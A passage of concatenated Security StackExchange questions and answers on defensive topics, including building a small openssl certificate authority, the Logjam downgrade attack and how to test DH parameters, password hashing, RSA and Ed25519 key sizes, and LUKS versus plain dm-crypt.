a format where your adversaries can use it to address your server. In conclusion, respect the open design principle.
{ "source": [ "https://security.stackexchange.com/questions/89108", "https://security.stackexchange.com", "https://security.stackexchange.com/users/76384/" ] }
89,319
I need to create my own CA for an intranet and unfortunately it seems there's no good answer about this on Security.SE. There are many resources online about this, but all of them are different and some use outdated defaults (MD5/SHA1, etc) which doesn't seem that trustworthy. There are also hundreds of different variations of openssl.cnf , ranging from a 10-line file to the enormous one that came by default with my distribution. I would like a canonical answer about setting up a simple CA for issuing server certs and client certs. Apparently it seems some people still don't understand that I'm not some large company where a CA compromise causes billions worth of losses and can't be mitigated easily so let me explain a bit better why I need the CA : multiple servers connected via insecure links (the Internet) need to communicate securely. I need a way to identify myself to those servers in order to perform administrative tasks, without going back and forth to my password manager every 10 seconds. no other CAs than mine should be able to impersonate any of the servers, no matter how unlikely ( but possible ) that is. There. My own PKI and a cert installed on each machine seems to fit the needs perfectly. One of the software I use also requires the use of a PKI, so just using self-signed certificates isn't an option. To compromise the PKI someone would need to compromise my work machine, and if that's done then the attacker can already do quite a bit of damage without even touching the PKI (as I would be logging in via SSH to the server from this machine anyway). That is a risk I'm accepting to take, and this PKI doesn't add any more risk than what there is already.
If your infrastructure is tiny , much of the details of running a CA (e.g. CRLs and such) can probably be ignored. Instead, all you really have to worry about is signing certificates. There's a multitude of tools out there that will manage this process for you. I even wrote one many years ago. But the one I recommend if you want something really simple is easy-rsa from the OpenVPN project. It's a very thin wrapper around the OpenSSL command-line tool. If you're going to be managing a LOT of certificates and actually dealing with revocation and stuff, you'll want a much more complex and feature-complete utility. There are more than enough suggestions already provided, so instead I'll just stick with the basics of what you're trying to accomplish. But here's the basic procedure. I'll explain it with OpenSSL, but any system will do. Start by creating your "root" CA -- it'll be a self-signed certificate. There are several ways to do this; this is one. We'll make ours a 10-year cert with a 2048-bit key. Tweak the numbers as appropriate. You mentioned you were worried about hashing algorithm, so I added -sha256 to ensure it's signed with something acceptable. I'm encrypting the key using AES-256, but that's optional. You'll be asked to fill out the certificate name and such; those details aren't particularly important for a root CA. # First create the key (use 4096-bits if that's what floats your boat) openssl genrsa -aes256 -out root.key 2048 # Then use that key to generate a self-signed cert openssl req -new -x509 -key root.key -out root.cer -days 3652 -sha256 If you encrypted the key in the first step, you'll have to provide the password to use it in the second. Check your generated certificate to make sure that under "Basic Constraints" you see "CA: TRUE". That's really the only important bit you have to worry about: openssl x509 -text < root.cer Cool. OK, now let's sign a certificate. We'll need another key and this time a request. You'll get asked about your name and address again. What fields you fill in and what you supply is up to you and your application, but the field that matters most is the "Common Name". That's where you supply your hostname or login name or whatever this certificate is going to attest. # Create new key openssl genrsa -aes256 -out client1.key 2048 # Use that key to generate a request openssl req -new -key client1.key -out client1.req # Sign that request to generate a new cert openssl x509 -req -in client1.req -out client1.cer -CA root.cer -CAkey root.key -sha256 -CAcreateserial Note that this creates a file called root.srl to keep our serial numbers straight. The -CAcreateserial flag tells openssl to create this file, so you supply it for the first request you sign and then never again. And once again, you can see where to add the -sha256 argument. This approach -- doing everything manually -- is in my opinion not the best idea. If you're running a sizable operation, then you'll probably want a tool that can keep track of all your certificates for you. Instead, my point here was to show you that the output you want -- the certificates signed the way you want them -- is not dependent on the tools you use, but rather the options you provide to those tools. Most tools can output a wide variety of configurations, both strong and weak, and it's up to you to supply the numbers you deem appropriate. Outdated defaults are par for the course.
{ "source": [ "https://security.stackexchange.com/questions/89319", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
89,383
In the SSL handshake both the client and server generate their respective random numbers. The client then generates a pre master secret and encrypts it with the server's public key. However, why can't the client just generate the pre master secret and send that to the server? Why do we need a client and server random? Is it to contribute to the entropy in the master secret, or for uniformity with other key exchange algorithms such as DH?
From The First Few Milliseconds of an HTTPS Connection: The master secret is a function of the client and server randoms. master_secret = PRF(pre_master_secret, "master secret", ClientHello.random + ServerHello.random) Both the client and the server need to be able to calculate the master secret. Generating a pre-master secret on the client and just sending that to the server would mean the server contributes no randomness of its own to the master secret. Why not just use the pre-master? This would mean that the entire key generation routine was based on client-generated values. If a Man-In-The-Middle attacker replayed the handshake, the same pre-master secret would be sent and then used for the connection. Having the server generate a random value (ServerHello.random) will mean that the MAC secret is different even if the ClientHello.random is repeated, and therefore the MAC and encryption keys will be different, preventing any replay attack.
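To make the quoted PRF line concrete, here is a minimal sketch of the TLS 1.2 PRF (the HMAC-SHA-256 construction from RFC 5246) with toy byte strings standing in for the real values. It is an illustration only, not code from the quoted article:

```python
import hmac, hashlib

def p_sha256(secret, seed, length):
    """TLS 1.2 P_SHA256 expansion (RFC 5246, section 5)."""
    out, a = b"", seed
    while len(out) < length:
        a = hmac.new(secret, a, hashlib.sha256).digest()            # A(i)
        out += hmac.new(secret, a + seed, hashlib.sha256).digest()  # HMAC(secret, A(i) + seed)
    return out[:length]

def prf(secret, label, seed, length=48):
    return p_sha256(secret, label + seed, length)

# Both sides can compute this because both know all three inputs:
pre_master = b"\x03\x03" + b"\x00" * 46   # toy value, not a real pre-master secret
client_random = b"C" * 32                 # toy ClientHello.random
server_random = b"S" * 32                 # toy ServerHello.random

master_secret = prf(pre_master, b"master secret", client_random + server_random)
print(len(master_secret))   # 48 bytes; changes if either random changes
```

Because both randoms are mixed in, a replayed ClientHello combined with a fresh ServerHello.random yields a different master secret, which is the point being made above.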
{ "source": [ "https://security.stackexchange.com/questions/89383", "https://security.stackexchange.com", "https://security.stackexchange.com/users/76655/" ] }
89,642
If my website is targeted for a DDoS attack after I have been paid for completing the website, and I get an angry phone call from the client regarding outage of service, what do I do? It hasn't actually happened yet, but the idea haunts me.
The following is all hypothetical: First off, you should NEVER sign an SLA in this case, or guarantee any uptime whatsoever. (You are delivering a website, not the service that hosts it.) Secondly, use a hosting company that can defend against a DoS attack in some way. (Be aware of SLAs and their limitations.) You need to think of yourself in the same way a plumber does. The plumber is not responsible for your water service, just for leaks and work on the pipes. A DDoS would be like an overpressure on the water lines (say, 1000 times more than they are designed for), and the fact that the pipes then break is not the plumber's fault but the water company's. All the plumber can do is fix it after the water has been turned off.
{ "source": [ "https://security.stackexchange.com/questions/89642", "https://security.stackexchange.com", "https://security.stackexchange.com/users/76855/" ] }
89,689
I heard there is a "new" TLS vulnerability named Logjam , what does it do and how do I prevent it?
TL;DR SSL/TLS client and server agree to use some weak crypto. Well, turns out that weak crypto is weak. In Detail When an SSL/TLS handshake is performed, the client sends a list of supported cipher suites, and the server chooses one. At the end of the initial handshake, some Finished messages are exchanged, and encrypted/protected with the newly negotiated crypto algorithms, and the contents of these messages are a hash of all the preceding messages. The idea is that an active attacker (a MitM attack) could try to manipulate the list of cipher suites sent by the client to remove all "strong" crypto suites, keeping only the weakest that both client and server support. However, this would break the Finished messages. Thus, these messages are meant (among other roles) to detect such downgrade attacks. In theory, it's fine; unless the client and server both support a cipher suite that is so weak that the MitM attacker can break it right away, unravel the whole crypto layer, and fix a Finished message in real time. Which is what happens here. In Even More Detail When using the "DHE" cipher suites (as in "Diffie-Hellman Ephemeral"), the server sends the "DH parameters" (modulus and generator) with which client and server will perform a Diffie-Hellman key exchange. Furthermore, the server signs that message with its private key (usually an RSA key, since everybody uses RSA in practice). The client verifies that signature (the public key is the one in the server certificate), then proceeds to use the DH parameters to complete the key exchange. It so happens that in the previous century, there were some rather strict US export regulations on crypto, and this prompted "export cipher suites", i.e. weak crypto that was compatible with these regulations. Many SSL servers still support these "export cipher suites". In particular, some cipher suites that use DHE and mandate a DH modulus of no more than 512 bits. Moreover, most SSL servers use the same modulus, because using the one provided with the SSL library is easier than generating your own. Reusing the same modulus as everybody else is not a big issue; DH tolerates that just fine. However, it means that if an attacker invests a lot of computation in breaking one DH instance that uses a given modulus p, the same attacker can reuse almost all of the work for breaking other instances that use the same modulus p. So the attack runs like this: The attacker is in the MitM position, where he can modify data flows in real time, The attacker alters the list of cipher suites sent by the client to specify the use of an export DHE cipher suite, The server complies and sends a 512-bit modulus p, The client is still persuaded that it is doing a non-export DHE, but a DH modulus is a DH modulus, so the client accepts the weak/export modulus from the server just fine, The attacker uses his pre-computations on that value p to break the DH in real time and fix the Finished messages. The Logjam article authors call this a "protocol flaw" because the ServerKeyExchange message that contains the export DH parameters is not tagged as "for export", and thus is indistinguishable (save for the modulus length) from a ServerKeyExchange message that contains non-export DH parameters. However, I would say that the real flaw is not there; the real problem is that the client and server agree to use a 512-bit DH modulus even though they both know that it is weak. What should you do? Well, the same thing as always: install patches from your software vendors.
As a matter of fact, this should go without saying. On the client side, Microsoft has already patched Internet Explorer to refuse to use a too small modulus. A fix for Firefox in the form of a plugin by Mozilla is available here now. It is expected that other browser vendors (Opera, Chrome...) will soon follow. On the server side, you can explicitly disable support for "export" cipher suites, and generate your own DH parameters. See that page for details. Note that IIS is kind of immune to all of this because apparently it never supported DHE cipher suites with anything else than a DSS server certificate, and nobody uses DSS server certificates. Note that ECDHE cipher suites, in which "EC" stands for "elliptic curve", are not at risk here, because: There are no "export" ECDHE cipher suites (ECDHE cipher suites were defined after the US export regulations were considerably lifted). Clients in general support only a few specific curves (usually only two of them, P-256 and P-384) and neither is weak enough to be broken (not now, not in the foreseeable future either). And what about the NSA? The Logjam researchers include some talk about how some "attackers with nation-state resources" could break through 1024-bit DH. This is quite a stretch. In my experience, nation states indeed have a lot of resources and are good at spending it, but that's not the same thing as succeeding at breaking hard crypto. Nevertheless, if you fear that 1024-bit DH is "too weak", go for 2048-bit (this is the recommended one anyway), or ECDHE. Or simply accept that people with overwhelming resources really have overwhelming resources and won't be defeated by a simple modulus size. Those who can spend billions of dollars for cracking machines can also bribe your kids with a few hundreds of dollars to go through your computer files and your wallet.
{ "source": [ "https://security.stackexchange.com/questions/89689", "https://security.stackexchange.com", "https://security.stackexchange.com/users/67595/" ] }
89,773
In response to Logjam I want to prove I've hardened my services. I know that the DH param has to be at least 2048 bits and self-generated. But I am unable to find a way to actually check this for something other than an HTTPS site. (That I can do here.) I would like to check my other SSL-protected services for this as well: Mail (Postfix and Dovecot) SSH VPN Any other I got as far as openssl s_client -starttls smtp -crlf -connect localhost:25 But that yielded: CONNECTED(00000003) depth=3 C = SE, O = ME, OU = Also ME, CN = Me again verify error:num=19:self signed certificate in certificate chain verify return:0 Server certificate -SNIPED SOME VALUES- --- SSL handshake has read 6118 bytes and written 466 bytes --- New, TLSv1/SSLv3, Cipher is ECDHE-RSA-AES256-GCM-SHA384 Server public key is 2048 bit Secure Renegotiation IS supported Compression: NONE Expansion: NONE SSL-Session: Protocol : TLSv1.2 Cipher : ECDHE-RSA-AES256-GCM-SHA384 Session-ID: 6EAA8A5B22E8C18E9D0E78A0B08447C8449E9B9543601BC53F57CB2059597754 Session-ID-ctx: Master-Key: <MASTERKEY> Key-Arg : None PSK identity: None PSK identity hint: None SRP username: None Start Time: 1432213909 Timeout : 300 (sec) Verify return code: 19 (self signed certificate in certificate chain) --- 250 DSN How can I test the DH parameters? And what should I watch for to know if I'm at risk?
Do the smoke test: (stolen from the OpenSSL blog. (Archived here.)) openssl s_client -connect www.example.com:443 -cipher "EDH" | grep "Server Temp Key" The key should be at least 2048 bits to offer a comfortable security margin comparable to RSA-2048. Connections with keys shorter than 1024 bits may already be in trouble today. (Note: you need OpenSSL 1.0.2. Earlier versions of the client do not display this information.) (If the connection fails straight away, then the server does not support ephemeral Diffie-Hellman ("EDH" in OpenSSL-speak, "DHE" elsewhere) at all and you're safe from Logjam.) [...] Finally, verify that export ciphers are disabled: $ openssl s_client -connect www.example.com:443 -cipher "EXP" The connection should fail. In other words: get OpenSSL 1.0.2. add the -cipher "EDH" option to your connect string. assume vulnerability if export ciphers are enabled on the server. assume vulnerability if a 512-bit key (or anything less than 2048 bits) turns up.
{ "source": [ "https://security.stackexchange.com/questions/89773", "https://security.stackexchange.com", "https://security.stackexchange.com/users/63999/" ] }
89,825
I am having a debate with several people regarding how much protection full disk encryption provides. dm-crypt is being used to encrypt data which is required by my company to be encrypted at rest. The Linux servers hosting the data reside in a secure data center with very little risk of unauthorized physical access, let alone someone actually stealing the server. My argument is that in this situation, while complying with the letter of the law, they have done little to nothing to actually reduce risk associated with unencrypted data. In effect, from a logical standpoint, they are in the exact same situation as if no encryption had been implemented at all. I am curious though if this train of thought is correct; thoughts? To tailor the question more to my specific situation, regarding physical protection, the controls around that are typically very sound. I am not saying risk is eliminated but it is considered to be low. Same with disposal of the drives: the destruction controls operate pretty effectively and risk is considered low. From a logical access standpoint the servers are not Internet facing, are behind a firewall, logical access is well controlled (but many have access), and they are not virtualized. Further, the servers operate 24x7; the only time they are rebooted is if it's needed after a change or during installation of a new one. My concern is that in the event an insider goes rogue, or an unauthorized user exploits a logical security flaw, the full disk encryption does nothing to protect the data versus using some of the other field- or file-level encryption tools available. Whereas the people I am debating argue that this is not the case.
Two generic things you apparently have missed: In case of disk failure, having the data encrypted at rest solves the issue of having potentially sensitive data on a media you can't access any more. It makes disposing of faulty drives easier and cheaper (and it's one less problem) Full disk encryption also makes it harder for an attacker to retrieve data from the "empty" space on the drives (which often contains trace of previously valid data) And if you're using VMs: Encrypting the partition makes you less dependent on the security of your hypervisor: if somehow the raw content of one of your drive "leaks" to another VM (which could happen if the drive space is reallocated to another VM and not zeroed out), that VM will be less likely to have access to the actual data (it would need to obtain the decryption key as well).
{ "source": [ "https://security.stackexchange.com/questions/89825", "https://security.stackexchange.com", "https://security.stackexchange.com/users/76061/" ] }
89,844
An introductory C++ course is offered every year in our university. In order for students to code in C++ and submit their assignments, we give them shell access to a Linux server. They use ssh to log in to the server with their accounts, do the coding and keep the compiled code in their home directories. However, giving shell access brings in a number of vulnerabilities with it. My question is, Is there any other way, apart from giving shell access to students, in which we can fulfil the above mentioned purpose? Any server side tool/application that can provide an interface to students for doing their c++ assignments without compromising server security?
What you need is relatively simple: you need to ensure that your students' unprivileged accounts are well confined. If you don't have a graphical environment involved, your situation is relatively simple. You should start by implementing the following actions: ensure users are created without administrative privileges (no sudo , no admin or wheel group) ensure users are unable to emulate a login screen to spoof your login screen (a classic for university, which I've seen happen) ensure proper polkitd policy which prevents users from suspending/shutting down the host ensure you don't run vulnerable/outdated suid / sgid services on the host ( see how to list them ) ensure no individual user can deplete the resources of the system (by configuring Systemd.cgroup to impose resource usage limits on the entire session of each user) strengthen your mandatory access control by installing and configuring properly SELinux (to limit students to a student role where they can only write in their home and in /tmp) expire accounts when necessary to avoid lingering accounts with eventually compromised passwords ( see this question on the Unix site ) you can even run students' sessions in separate containers using Systemd.nspawn which is designed to run fully working systems independently from one another, using Linux namespaces . This is the proper way to jail a session, not chroot You might then notice that students use the machines for other purposes than those allowed. You can limit access to machines to specific times using pam_time though that might get in the way of students getting their work done and should be balanced against the benefits it provides. Also, make sure that your network administrators know what traffic to expect on this host so they can detect undesirable traffic. All of this being said, I don't see the point in white-listing specific binaries (useless since students can compile and run their own code) as it may get in the way of students using legitimate development tools, e.g. alternative compilers, building toolchains, code analysis tools, code versioning tools, etc. As long as users can only harm themselves and you've got strong guarantees of that, the job is done. This isn't exactly a long-term production system anyway, students are only using it to fool around with educational code.
{ "source": [ "https://security.stackexchange.com/questions/89844", "https://security.stackexchange.com", "https://security.stackexchange.com/users/77057/" ] }
90,064
I started reading about password hashing recently on multiple sites like this page on crackstation and others, and from what I have understood, I should avoid using hashing algorithms like md5 and sha1 because they are outdated, and instead I should use sha256 with salt. But, after reading this page on the php manual, I noticed that they discourage the use of even sha256 and instead recommend using the password_hash() functions. I also noticed that most of these articles/pages were written in the interval of 2011-13, so I am not sure how secure salted sha256-hashed passwords are nowadays and whether or not they should still be used in webapps.
General-purpose hashes have been obsolete for passwords for over a decade. The issue is that they're fast, and passwords have low entropy, meaning brute-force is very easy with any general-purpose hash. You need to use a function which is deliberately slow, like PBKDF2, bcrypt, or scrypt. Crackstation actually explains this if you read the whole page. On the other hand, MD5 and SHA-1 aren't weaker than SHA-2 in the context of password hashing; their weakness is not relevant for passwords.
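As a concrete illustration, Python's standard library exposes PBKDF2 directly. This is a minimal sketch, not production guidance: the iteration count is an arbitrary example you would tune to your hardware, and a maintained library (bcrypt, argon2-cffi, passlib) is usually the better choice.

```python
import hashlib, hmac, os

def hash_password(password: str, iterations: int = 200_000):
    salt = os.urandom(16)                      # per-password random salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, iterations, dk                # store all three

def verify_password(password: str, salt: bytes, iterations: int, expected: bytes) -> bool:
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(dk, expected)   # constant-time comparison

salt, n, stored = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, n, stored))  # True
```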
{ "source": [ "https://security.stackexchange.com/questions/90064", "https://security.stackexchange.com", "https://security.stackexchange.com/users/43741/" ] }
90,077
A lot of people recommend using Ed25519 instead of RSA keys for SSH. The introduction page of Ed25519 ( http://ed25519.cr.yp.to/ ) says: [..] breaking it has similar difficulty to breaking [..] RSA with ~3000-bit keys [..] So speaking only of security (not speed!), why should one not prefer RSA 4096 over Ed25519 ? If Ed25519 only provides ~3000 bit key strength, RSA with 4096 bit should be much more secure?
Key strengths, and their equivalences, become meaningless when they reach the zone of "cannot be broken with existing and foreseeable technology", because there is no such thing as more secure than that. It is a common reflex to try to think of key sizes as providing some sort of security margin, but this kind of reasoning fails beyond some point. Basically, the best known algorithms for breaking RSA, and for breaking elliptic curves, were already known 25 years ago. Since then, breaking efficiency has improved because of faster computers, at a rate which was correctly predicted. It is a tribute to researchers that they could, through a lot of fine tuning, keep up with that rate, as shown on this graph: (extracted from this answer). The bottom line is that while a larger key offers longer predictable resistance, this kind of prediction works only as long as technology improvements can be, indeed, predicted, and anybody who claims that he knows what computers will be able to do more than 50 years from now is either a prophet, a madman, a liar, or all of these together. 50 years from now, the optimistic formula given in the answer quoted above ((year - 2000) * 32 + 512) means that, at best, RSA records could contemplate approaching 2592 bits. The conclusion is that there is no meaningful way in which 3000-bit and 4000-bit RSA keys could be compared with each other, from a security point of view. They both are "unbreakable in the foreseeable future". A key cannot be less broken than not broken. An additional and important point is that "permanent" keys in SSH (the keys that you generate and store in files) are used only for signatures. Breaking such a key would allow an attacker to impersonate the server or the client, but not to decrypt a past recorded session (the actual encryption key is derived from an ephemeral Diffie-Hellman key exchange, or an elliptic curve variant thereof). Thus, whether your key could be broken, or not, in the next century has no importance whatsoever. To achieve "ultimate" security (at least, within the context of the computer world), all you need for your SSH key is a key that cannot be broken now, with science and technology as they are known now. Another point of view on the same thing is that your connections can only be as secure as the two endpoints. Nothing constrains your enemies, be they wicked criminals, spies or anything else, to try to defeat you by playing "fair" and trying to break your crypto upfront. Hiring thousands upon thousands of informants to spy on everybody (and on each other) is very expensive, but it has been done, which is a lot more than can be said about breaking a single RSA key of 2048 bits.
{ "source": [ "https://security.stackexchange.com/questions/90077", "https://security.stackexchange.com", "https://security.stackexchange.com/users/60931/" ] }
90,093
Apparently Travel Sentry locks can only be opened: by their owner, by the TSA , CATSA and "other security agencies". How do they work technically? Is there some electronics embedded with authentication capabilities? Do the security agencies have a kind of master code/key? Do they have a big database giving the code for each individual lock? In that case I guess the lock has to emit some kind of identifier? Apparently some have just a code, some other have just a key hole: And some have both, see the pictures on Wikimedia Commons .
They're all master keyed. On each lock you'll see a number ("TSA007" or such) that signifies which key on the ring the TSA agent needs to use to open the lock. It's bad enough that anybody can buy a few of them and disassemble the locks to know exactly which keys to cut (as one could with any keyed-alike lock). The effort to open them is far lower than that, though: they're embarrassingly insecure locks on their own. You can watch somebody in this video pop open 3 locks in a row, each with seconds of effort using the same generic jiggler keys: https://www.youtube.com/watch?v=xtJx3j7AhQk
{ "source": [ "https://security.stackexchange.com/questions/90093", "https://security.stackexchange.com", "https://security.stackexchange.com/users/634/" ] }
90,169
I'm having a problem understanding the size of an RSA public key and its private key pair. I saw different key sizes for the RSA algorithm (512, 1024,... for example), but is this the length of the public key or the length of the private key, or are both equal in length? I already searched for it, but: In this question it is mentioned that both private and public keys for the RSA algorithm have equal length. But: In this question it is mentioned that they have different lengths! Both answers are accepted. Are they equal or not in length? Moreover, my Java Card applet that generates RSA key pairs always returns a public key and private key of equal length. The online tools for generating RSA key pairs have different-length output! Examples: Online tool 1: Online tool 2:
> I saw different key sizes for RSA algorithm (512, 1024,... [bits] for example) but, is this the length of public key or the length of private key or both are equal in length? It's the length of the modulus used to compute the RSA key pair. The public key is made of modulus and public exponent, while the private key is made of modulus and private exponent. > but the online tools for generating RSA key pairs have different lengths output! The first picture shows public and private key in PEM format, encoded in Base64 (and not modulus and exponents of the key, which instead are shown in the second picture). The content of the RSA private key is as follows: -----BEGIN RSA PRIVATE KEY----- RSAPrivateKey ::= SEQUENCE { version Version, modulus INTEGER, -- n publicExponent INTEGER, -- e privateExponent INTEGER, -- d prime1 INTEGER, -- p prime2 INTEGER, -- q exponent1 INTEGER, -- d mod (p-1) exponent2 INTEGER, -- d mod (q-1) coefficient INTEGER, -- (inverse of q) mod p otherPrimeInfos OtherPrimeInfos OPTIONAL } -----END RSA PRIVATE KEY----- while a RSA public key contains only the following data: -----BEGIN RSA PUBLIC KEY----- RSAPublicKey ::= SEQUENCE { modulus INTEGER, -- n publicExponent INTEGER -- e } -----END RSA PUBLIC KEY----- and this explains why the private key block is larger. Now, why does the private key contain so much data? After all, only the modulus n and the private exponent d are needed. The reason all the other stuff is precomputed and included in the private key block is to speed up decryption using the Chinese Remainder Algorithm . (Kudos to @dbernard for pointing this out in the comments.) Note that a more standard format for non-RSA public keys is -----BEGIN PUBLIC KEY----- PublicKeyInfo ::= SEQUENCE { algorithm AlgorithmIdentifier, PublicKey BIT STRING } AlgorithmIdentifier ::= SEQUENCE { algorithm OBJECT IDENTIFIER, parameters ANY DEFINED BY algorithm OPTIONAL } -----END PUBLIC KEY----- More info here . BTW, since you just posted a screenshot of the private key I strongly hope it was just for tests :)
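You can see the same asymmetry programmatically. Here is a small sketch with the third-party Python cryptography package (my choice of tool for illustration; the answer itself is library-agnostic):

```python
from cryptography.hazmat.primitives.asymmetric import rsa

key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

pub = key.public_key().public_numbers()
priv = key.private_numbers()

print(pub.n.bit_length(), pub.e)                  # modulus (the "key size") and public exponent
print(priv.p.bit_length(), priv.q.bit_length())   # the two primes, roughly 1024 bits each
print(priv.d.bit_length())                        # private exponent
# dmp1, dmq1 and iqmp are the precomputed CRT values mentioned above
print(priv.dmp1.bit_length(), priv.dmq1.bit_length(), priv.iqmp.bit_length())
```

The public half carries only n and e; the private half carries the primes, the private exponent and the precomputed CRT values, which is exactly why the private PEM block is the larger one.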
{ "source": [ "https://security.stackexchange.com/questions/90169", "https://security.stackexchange.com", "https://security.stackexchange.com/users/50329/" ] }
90,175
How can RDP connections on the network be identified if they are no longer using TCP 3389 and are instead using a non-standard port? If the administrator of a system changed the port for remote connections from 3389 to something else and did not update it in the IDS or firewall, then how can someone detect the active remote connections at the network level?
{ "source": [ "https://security.stackexchange.com/questions/90175", "https://security.stackexchange.com", "https://security.stackexchange.com/users/77252/" ] }
90,191
A DoS (short for "denial of service") attack is a form of attack used on web services which aims to "crash" the service. Is there any motive of this form of attack besides crashing the service / website? For example, I could think of blackmailing/ doing harm to a competitor / political reasons as a direct motive for DoS attack. But are there other, more indirect motives? Would it be possible to get data from the service with a DoS attack? If so, how?
In general a (Distributed) Denial of Service attack will not provide you with much information directly. However, there are a few scenarios where information could be gleaned as a result of a DoS. The following are a few examples, but this is not at all exhaustive: A load balancer may divulge internal subnet information or leak internal machine names in situations where backing systems are offline. A DoS that shuts down the database first may cause an application to reveal the database engine type, connection username, or internal IP address via an error message. A poorly implemented API could result in a "fail-open" scenario--DoS'ing a Single Sign On server may give an attacker the ability to log in unauthenticated, or with local credentials. In Advanced Persistent Threat scenarios, DoS'ing detection infrastructure may allow an attacker to remain undetected during other information-gathering stages. Similarly, DoS'ing the admin interface of a firewall could hinder network administration's incident response efforts. In an extreme case, a DoS against a key-revocation service could allow an attacker to continue to use revoked or known-compromised credentials. Other motives for a Denial of Service attack become apparent if you consider the users of a system as targets in addition to the system itself: A Denial of Service attack against a website that sells concert tickets may allow an attacker to buy tickets to an event that would have otherwise sold out in minutes. A DoS against a version control system could prevent a development company from delivering software on time. A DoS against a social media site could make coordinating political protests more difficult, or even impossible.
{ "source": [ "https://security.stackexchange.com/questions/90191", "https://security.stackexchange.com", "https://security.stackexchange.com/users/3286/" ] }
90,309
I apologize if this is an obvious question, I'm not very familiar with hardware. I am planning on hosting a few personal websites from my home, but I'm concerned about my security. I'm using a fairly old cable router (probably around 10 years old I would guess, it's ASUS RX3041). I was wondering if it would be possible for an attacker to send some malicious packets and gain access to my router or be able to send packets to computers connected to the router on ports that are not mapped, or any other exploit, really. Even if the router was compromised, the server should still be secured with its own firewall and what not but what I want to know is if I can rely on the router as a security layer. Is it reliable to host a website with my current setup?
TL:DR - Yes, routers CAN be vulnerable. Misconfigured/Unconfigured routers - A ton of people just install their routers and leave the default accounts turned on without modification. Thus allowing attackers easy access. Vulnerable built in scripts - http://www.reddit.com/r/netsec/comments/1xy9k6/that_new_linksys_worm/ See: What is the "Moose" worm and how can I protect myself from it? http://www.pcworld.com/article/2899732/at-least-700000-routers-given-to-customers-by-isps-are-vulnerable-to-hacking.html http://www.pcworld.com/article/2464300/fifteen-new-vulnerabilities-reported-during-router-hacking-contest.html http://searchsecurity.techtarget.com/news/4500246976/NetUSB-router-vulnerability-puts-devices-in-jeopardy As for answering whether your 'current setup' is secure. We would need a bit more information about the entire scope of your security onion before being able to answer that.
{ "source": [ "https://security.stackexchange.com/questions/90309", "https://security.stackexchange.com", "https://security.stackexchange.com/users/68834/" ] }
90,350
It seems that most sites or systems will just state "Invalid username or password" as a means to not reveal usernames for use in brute force (and other) attacks. Seems like a good idea as a general rule. However, on many of them you can follow the "forgotten password?" link and quite often you get "This email address / username isn't registered". Should this not follow the same process and not reveal this information? Is it just bad design practice that has become the norm? Edit to add: I'm thinking about a secure system where the users aren't able to self-register, nor should the general public have access. So it should be secured to those who have access and that's all.
Yes, it is bad security practice indeed. When using the Forgotten Password feature, the site should respond with a message: "An email has just been sent to the specified email address, if it exists and is registered within our system. Please read the email and follow the instructions." Or simply: "Please check your email inbox for instructions on how to proceed to reset your password" , since it's a safe assumption that the account reset procedure was initiated by the legitimate account owner. EDIT: It has been pointed out that an attacker might find out whether an email address is registered in the system by trying to open an account with that address. To thwart this attack, the registration procedure must be changed too; the user should be allowed to register only after he/she verified his/her email address, as follows. Upon entering an email address for a new registration, the site should respond with the message "An email has been sent to the email address you provided. Please read the email and follow the instructions to complete the registration, if necessary". Then the email message would contain the steps to follow to complete the registration, or a simple warning to the user if the email address was already registered.
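Here is a sketch of what that uniform behaviour can look like in code. The user_store and mailer objects are hypothetical placeholders rather than a real framework API:

```python
import secrets

RESET_MESSAGE = ("If that address is registered, an email with password-reset "
                 "instructions has been sent to it.")

def request_password_reset(email, user_store, mailer):
    """Always return the same message, whether or not the account exists."""
    user = user_store.find_by_email(email)        # hypothetical data-access call
    if user is not None:
        token = secrets.token_urlsafe(32)         # unguessable one-time token
        user_store.save_reset_token(user, token)  # hypothetical persistence call
        mailer.send_reset_email(email, token)     # hypothetical mail helper
    # No "else" branch that leaks anything: same response either way.
    return RESET_MESSAGE
```

In practice you would also want the two branches to take roughly the same time (for example by queuing the email for later delivery) so that response timing does not leak what the message itself no longer does.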
{ "source": [ "https://security.stackexchange.com/questions/90350", "https://security.stackexchange.com", "https://security.stackexchange.com/users/73340/" ] }
90,468
I am curious about the following claim from the Cryptsetup FAQ: 2.4 What is the difference between "plain" and LUKS format? First, unless you happen to understand the cryptographic background well, you should use LUKS. It does protect the user from a lot of common mistakes. Plain dm-crypt is for experts. After reading through the manual I can see the benefit of LUKS in particular situations. However, I do NOT see the need to "understand the cryptographic background" to use plain dm-crypt. From reading the manual, I understand that: There are some things done in LUKS (like hashing) that don't happen in plain dm-crypt. The result is that I need a bit more entropy in my passphrase to make it safe. In plain mode you can argue it's easier to accidentally overwrite encrypted data. The second point is not really related to understanding cryptography, and it doesn't seem to require expert cryptography knowledge to prevent this (note that I do agree that this is a risk and it can easily happen, even to the best, but I would just argue that having or not having expert cryptography knowledge does not have much of an impact). So on to the first point. In the same manual the following is stated: 5.12 What about iteration count with plain dm-crypt? Simple: There is none. There is also no salting. If you use plain dm-crypt, the only way to be secure is to use a high entropy passphrase. If in doubt, use LUKS instead. This implies to me that the only thing needed to have a secure setup with plain dm-crypt, cryptography-wise, is to use a high-entropy passphrase (higher than what would be needed in LUKS for the same level of security). Again, it doesn't take rocket science to understand or apply this. Likely, I am not understanding or capturing something important here, but my question is therefore: what is the kind of cryptography knowledge required that makes dm-crypt only recommended to experts? If I stick to standard operations, and I do not require any of the features from LUKS, what risks am I as a non-expert taking?
If I stick to standard operations, and I do not require any of the features from LUKS, what risks am I as a non-expert taking? LUKS partitions have a header that ensures such a partition won't be seen as ext2, vfat, etc. A plain dm-crypt partition may coincidentally end up looking like a unencrypted filesystem, and has a chance of being written to accidentally, destroying your data. LUKS checks if you entered the correct passphrase. If you put in the wrong passphrase, plain dm-crypt won't pick up on this; instead, it will happily give you garbled crypto-mapping which may also coincidentally look like an unencrypted filesystem, and has a chance of being written to accidentally, destroying your data. LUKS stores the type of encryption used, while dm-crypt requires you to supply the same options each time. If, after a period of not using your encrypted device, you find there are a few gaps in your recollection of what the password was, and it turns out you forgot the encryption options as well, you are doubly hosed (this happened to me personally before LUKS existed; the encrypted data wasn't so important so I just reformatted after unsuccessfully trying to get in for an hour or so). Also, there may have been a period during the development of cryptsetup in which essiv was not the default for dm-crypt, but was for LUKS, and the documentation you are reading may have been intended to allude to that. Finally, some of the options of 